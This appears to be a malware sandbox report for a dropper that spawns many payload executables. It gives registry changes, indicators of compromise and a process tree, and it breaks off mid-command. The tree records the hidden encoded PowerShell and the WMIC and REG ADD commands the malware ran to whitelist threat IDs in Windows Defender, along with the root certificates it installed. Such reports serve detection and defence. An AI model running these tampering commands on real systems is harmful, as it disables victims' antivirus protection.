Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath | MicrosoftEdge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 29b18faf9fafd701 | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" | WMIC.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | MicrosoftEdgeCP.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" | MicrosoftEdgeCP.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000 | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\skipvideoads.com\Total = "70" | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "230" | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\NextUpdateDate = "339144012" | MicrosoftEdge.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{TKR9TRJ3-XT3I-VY52-597M-MXZ27DTVMS64} | rundll32.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content | WMIC.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" | WMIC.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{58865325-3540-4DB9-8375-AECEDBA2B9E8} = "0" | WMIC.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0" | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate | WMIC.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CacheLimit = "256000" | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates | MicrosoftEdge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000a00acee0e2fe6e3822ee36cf75bc0ef4607d684396b6676fff963462cd519e96690d603f8916ceed3a475a383cd10027c3dec43dcbb20022f5425a49506fab354455b66d315f3425240d6c9714c5bd279f79ef36b260d7223d0f | WMIC.exe
Set
value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\allhugeblog.com\ = "29" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$vBulletin 3 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\FirstRecoveryTime = eda47e9320aed701 WMIC.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active WMIC.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore WMIC.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{D6F33E38-7E29-4AEF-A1CA-89939F37EDCE}" WMIC.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local 
Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\allhugeblog.com\ = "926" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery WMIC.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore WMIC.exe -
Processes:
(description, ioc, process; certificate blob values omitted)
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 (Sun19262b9e49ad.exe)
- Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob omitted] (Sun19262b9e49ad.exe)
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 (installer.exe)
- Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = [certificate blob omitted] (installer.exe)
- Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = [certificate blob omitted] (installer.exe)
Script User-Agent 3 IoCs
Uses user-agent string associated with script host/environment.
Processes:
(description, flow, ioc)
- HTTP User-Agent header, flow 11: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- HTTP User-Agent header, flow 83: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- HTTP User-Agent header, flow 154: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
(pid, process; repeated entries collapsed)
- 1528 powershell.exe
- 3496 Install.exe
- 4584 WerFault.exe
- 1584 (no process name given)
- 2804 DyzW75Vg9OFYpumqyTL2gvjP.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
(pid, process)
- 1584 (no process name given)
Suspicious behavior: MapViewOfSection 15 IoCs
Processes:
(pid, process; repeated entries collapsed)
- 3496 Install.exe
- 4240 QSydSxCGLaGDRZ1oU1LJVgeo.exe
- 6936 MicrosoftEdgeCP.exe
- 1584 (no process name given)
- 5720 MicrosoftEdgeCP.exe
- 7188 MicrosoftEdgeCP.exe
- 8656 wcbafrf
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
(description, pid, process; grouped by process, repeated entries collapsed)
- 3124 Sun191101c1aaa.exe: SeDebugPrivilege
- 1640 Sun19262b9e49ad.exe: SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, 31, 32, 33, 34, 35
- 2392 Sun19e4ade31b2a.exe: SeDebugPrivilege
- 1244 Sun195a1614ec24e6a.exe: SeDebugPrivilege
- 1528 powershell.exe: SeDebugPrivilege
- 2864 Sun198361825f4.exe: SeDebugPrivilege
- 4916 2.exe: SeDebugPrivilege
- 4864 PublicDwlBrowser1100.exe: SeDebugPrivilege
- 3744 5.exe: SeDebugPrivilege
- 4584 WerFault.exe: SeDebugPrivilege
- 2804 DyzW75Vg9OFYpumqyTL2gvjP.exe: SeRestorePrivilege, SeBackupPrivilege, SeDebugPrivilege
- 1236 LivelyScreenRecF18.exe: SeDebugPrivilege
- 5004 BearVpn 3.exe: SeDebugPrivilege
- 3288 taskkill.exe: SeDebugPrivilege
- 3280 WerFault.exe: SeDebugPrivilege
- 4784 WerFault.exe: SeDebugPrivilege
- 1016 WerFault.exe: SeDebugPrivilege
- 4212 rundll32.exe: SeDebugPrivilege
- 1588 WerFault.exe: SeDebugPrivilege
- 3916 svchost.exe: SeDebugPrivilege
- 1260 powershell.exe: SeDebugPrivilege
- 1584 (no process name given): SeShutdownPrivilege, SeCreatePagefilePrivilege
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
(pid, process; repeated entries collapsed)
- 5964 ultramediaburner.tmp
- 5792 installer.exe
- 1584 (no process name given)
- 7268 chrome.exe
- 5628 chrome.exe
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
(pid, process; repeated entries collapsed)
- 7268 chrome.exe
- 5628 chrome.exe
Suspicious use of SetWindowsHookEx 10 IoCs
Processes:
(pid, process; repeated entries collapsed)
- 1584 (no process name given)
- 6096 WMIC.exe
- 6936 MicrosoftEdgeCP.exe
- 4128 MicrosoftEdge.exe
- 5720 MicrosoftEdgeCP.exe
- 7496 MicrosoftEdge.exe
- 7188 MicrosoftEdgeCP.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
(source pid and process, then target pid and process; repeated entries collapsed)
- 3496 setup_x86_x64_install.exe wrote to memory of 372 setup_installer.exe
- 372 setup_installer.exe wrote to memory of 4076 setup_install.exe
- 4076 setup_install.exe wrote to memory of cmd.exe instances 380, 1160, 1452, 1500, 3684, 512, 3984, 3724, 1400, 2520, 2812, 2100 and 1784
- 380 cmd.exe wrote to memory of 1528 powershell.exe
- 3684 cmd.exe wrote to memory of 2392 Sun19e4ade31b2a.exe
- 1452 cmd.exe wrote to memory of 1640 Sun19262b9e49ad.exe
- 1500 cmd.exe wrote to memory of 3780 Sun193fda712d9f1.exe
- 1160 cmd.exe wrote to memory of 3920 Sun1917b8fb5f09db8.exe
- 3724 cmd.exe wrote to memory of 3124 Sun191101c1aaa.exe
- 512 cmd.exe wrote to memory of 3496 Sun1908b94df837b3158.exe
- 1400 cmd.exe wrote to memory of 3788 Sun19eb40faaaa9.exe
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies registry class
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\XOLcDlHHxqomGEP\kxXwdCM.exeC:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\XOLcDlHHxqomGEP\kxXwdCM.exe tt /site_id 739435 /S2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &3⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD 
\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t 